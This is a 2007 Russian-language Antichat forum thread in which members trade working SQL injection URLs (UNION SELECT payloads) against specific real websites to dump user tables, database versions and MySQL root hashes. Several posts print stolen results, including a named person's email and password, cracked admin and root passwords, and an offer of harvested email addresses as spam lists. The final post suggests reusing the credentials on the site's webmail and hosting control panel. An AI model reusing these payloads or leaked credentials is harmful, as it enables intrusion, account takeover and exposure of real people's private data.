HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 29.03.2007, 23:23
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Может и было...

Код:
http://www.cpdvd.ru/shop.shtml?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(nam,char(58),email,char(58),pass),14,15,16,17,18,19,20,21+from+users+limit+0,5/*
Т.к. скуля выводит все записи, то ограничил её лимитом что бы вывела записи с 0 по 5.
 
Ответить с цитированием

  #2  
Старый 30.03.2007, 01:15
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631

Репутация: 380
По умолчанию

Код:
http://www.kurscom.ru/catalog.php?a=2&id_shop=-1857+union+select+1,2,3,4,5,6,7,8,9,10,11,12,VERSION(),14,15+from+shop/*
больше ничего не нашел

P,S,
Код:
http://www.kurscom.ru/catalog.php?a=2&id_shop=-1857+union+select+1,2,3,4,5,6,7,8,9,10,11,mail,password,name,15+from+shop/*
name:EF EDUCATION FIRST
email:elena.ponomareva@ef.com
password:LH5029

Последний раз редактировалось maxster; 30.03.2007 в 01:53..
 
Ответить с цитированием

  #3  
Старый 30.03.2007, 04:39
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


По умолчанию

Код:
http://www.cybersquads.ru/articles/categories.php?arttype=-1'+union+select+1,2,3,4,5,6,7,8,concat(name,'%20:%20',password,'%20:%20',email,'%20:%20',icq,'%20:%20',homepage),10,11,12,13+from+users+limit+100/*
 
Ответить с цитированием

  #4  
Старый 30.03.2007, 09:52
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


По умолчанию

Код:
http://lib.web-malina.com/getbook.php?bid=-1+union+select+1,2,concat(uname,0x3a,pass),4,5,6,7,8,9+from+users+limit+1,1/*
логин:пасс
 
Ответить с цитированием

  #5  
Старый 30.03.2007, 10:56
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


По умолчанию

Код:
http://ad-store.ru/gorod/index.php?module=subjects&func=viewpage&pageid=1'
Подробности ошибки не выдает
 
Ответить с цитированием

  #6  
Старый 30.03.2007, 12:02
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://b-s.com.ua/cgi-bin/catalog.pl?id=-1+union+select+1,2,3,4,concat(database(),char(58),user(),char(58),version()),6,7,8,9,10,11,12+from+zakaz/*
to Joker-jar

Код:
http://ad-store.ru/gorod/index.php?module=subjects&func=viewpage&pageid=-1+union+select+1,2,3,4,concat(database(),char(58),user(),Char(58),version()),6,7,8,9,10,11,12,13,14,15,16,17/*

Последний раз редактировалось Grey; 30.03.2007 в 12:15..
 
Ответить с цитированием

  #7  
Старый 30.03.2007, 12:15
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


По умолчанию

2 Grey & Joker-jar
Код:
http://ad-store.ru/gorod/index.php?module=subjects&func=viewpage&pageid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+gorod_users/*
с именами столбцов, думаю, вы разберетесь
 
Ответить с цитированием

  #8  
Старый 30.03.2007, 14:31
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.2msk.ru/?module=food&id=-1+union+select+1,2,3,4,concat(database(),char(58),user(),char(58),version()),6,7,8,9,10,11,12,13,14,15,16,17/*
 
Ответить с цитированием

  #9  
Старый 30.03.2007, 14:58
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
По умолчанию

Цитата:
http://www.selfserviceworld.com/article.php?id=-16816%20union%20select%20id,concat_ws(char(58),nam e,email,password),3,4,5,6,7,8%20from%20users/*
admin:dbcc4a47bc32b0e84903c632fb0dc08c => admin:lackawanna
Цитата:
http://www.selfserviceworld.com/article.php?id=-16816%20union%20select%201,concat(user,char(58),pa ssword),3,4,5,6,7,8%20from%20mysql.user/*
root:54a43983056d0aa5 => root:f00bar
Админка - /admin. Залогиниться не могу ((

Идем дальше:
Цитата:
http://www.mcpost.com/article.php?id=-295%20union%20select%201,2,id,concat(username,char (58),password),5,6,7,8,9,0,11,12%20from%20users/*
mcpost:242d048c07a9cbb3c0f8895019cd9253 => mcpost:489hbc
Админку найти не могу((

И спам листы если кому нужны:
Цитата:
http://www.fdr.com.ua/article.php?id=-3888%20union%20select%201,concat(name,char(58),ema il),3,4,5,6,7,8%20from%20forum/*
____
 
Ответить с цитированием

  #10  
Старый 30.03.2007, 15:34
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


По умолчанию

Цитата:
Сообщение от kamaz  
mcpost:242d048c07a9cbb3c0f8895019cd9253 => mcpost:489hbc
Админку найти не могу((
можно в webmail зайти
Код:
http://www.mcpost.com/webmail
а можно и в Control Panel хостера)
Код:
https://mmm2624.sbc-webhosting.com/cgi-bin/authApp?msg=LOGIN&redirect=/cgi-bin/secure/index
логин/пасс те же

Последний раз редактировалось n1†R0x; 30.03.2007 в 15:38..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.